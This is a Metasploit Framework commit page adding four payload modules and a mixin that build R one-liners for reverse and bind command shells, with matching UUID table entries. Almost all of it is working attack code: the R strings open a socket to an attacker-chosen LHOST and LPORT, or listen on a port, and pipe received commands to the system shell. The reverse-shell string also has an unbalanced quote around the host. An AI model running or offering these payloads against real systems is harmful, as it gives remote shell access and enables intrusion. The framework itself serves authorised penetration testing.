Land #8857, Reverse and bind shells in R

bug/bundler_fix
Brent Cook 2017-08-21 15:49:24 -05:00
commit c14daf3fcc
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
6 changed files with 203 additions and 2 deletions

14
lib/msf/core/payload/r.rb Normal file
View File

@ -0,0 +1,14 @@
# -*- coding: binary -*-
require 'msf/core'
module Msf::Payload::R
def initialize(info = {})
super(info)
end
def prepends(buf)
buf
end
end

View File

@ -42,7 +42,8 @@ class Msf::Payload::UUID
23 => ARCH_ZARCH,
24 => ARCH_AARCH64,
25 => ARCH_MIPS64,
26 => ARCH_PPC64LE
26 => ARCH_PPC64LE,
27 => ARCH_R
}
Platforms = {
@ -69,7 +70,8 @@ class Msf::Payload::UUID
20 => 'js',
21 => 'python',
22 => 'nodejs',
23 => 'firefox'
23 => 'firefox',
24 => 'r'
}
# The raw length of the UUID structure

View File

@ -0,0 +1,48 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/payload/r'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = 516
include Msf::Payload::Single
include Msf::Payload::R
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Bind TCP (via R)',
'Description' => 'Continually listen for a connection and spawn a command shell via R',
'Author' => [ 'RageLtMan' ],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'ruby',
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
))
end
def generate
return prepends(r_string)
end
def prepends(r_string)
return "R -e \"#{r_string}\""
end
def r_string
return "s<-socketConnection(port=#{datastore['LPORT']}," +
"blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" +
"(pipe(readLines(s,1))),s)}"
end
end

View File

@ -0,0 +1,49 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/payload/r'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = 516
include Msf::Payload::Single
include Msf::Payload::R
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Reverse TCP (via R)',
'Description' => 'Connect back and create a command shell via R',
'Author' => [ 'RageLtMan' ],
'License' => MSF_LICENSE,
'Platform' => 'r',
'Arch' => ARCH_R,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'r',
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
))
end
def generate
return prepends(r_string)
end
def prepends(r_string)
return "R -e \"#{r_string}\""
end
def r_string
lhost = datastore['LHOST']
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
return "s<-socketConnection(host='#{lhost},port=#{datastore['LPORT']}," +
"blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" +
"(pipe(readLines(s, 1))),s)}"
end
end

View File

@ -0,0 +1,43 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/payload/r'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = 516
include Msf::Payload::Single
include Msf::Payload::R
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'R Command Shell, Bind TCP',
'Description' => 'Continually listen for a connection and spawn a command shell via R',
'Author' => [ 'RageLtMan' ],
'License' => MSF_LICENSE,
'Platform' => 'r',
'Arch' => ARCH_R,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'r',
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
))
end
def generate
return prepends(r_string)
end
def r_string
return "s<-socketConnection(port=#{datastore['LPORT']}," +
"blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" +
"(pipe(readLines(s,1))),s)}"
end
end

View File

@ -0,0 +1,45 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/payload/r'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = 516
include Msf::Payload::Single
include Msf::Payload::R
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'R Command Shell, Reverse TCP',
'Description' => 'Connect back and create a command shell via R',
'Author' => [ 'RageLtMan' ],
'License' => MSF_LICENSE,
'Platform' => 'r',
'Arch' => ARCH_R,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'r',
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
))
end
def generate
return prepends(r_string)
end
def r_string
lhost = datastore['LHOST']
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
return "s<-socketConnection(host='#{lhost},port=#{datastore['LPORT']}," +
"blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" +
"(pipe(readLines(s, 1))),s)}"
end
end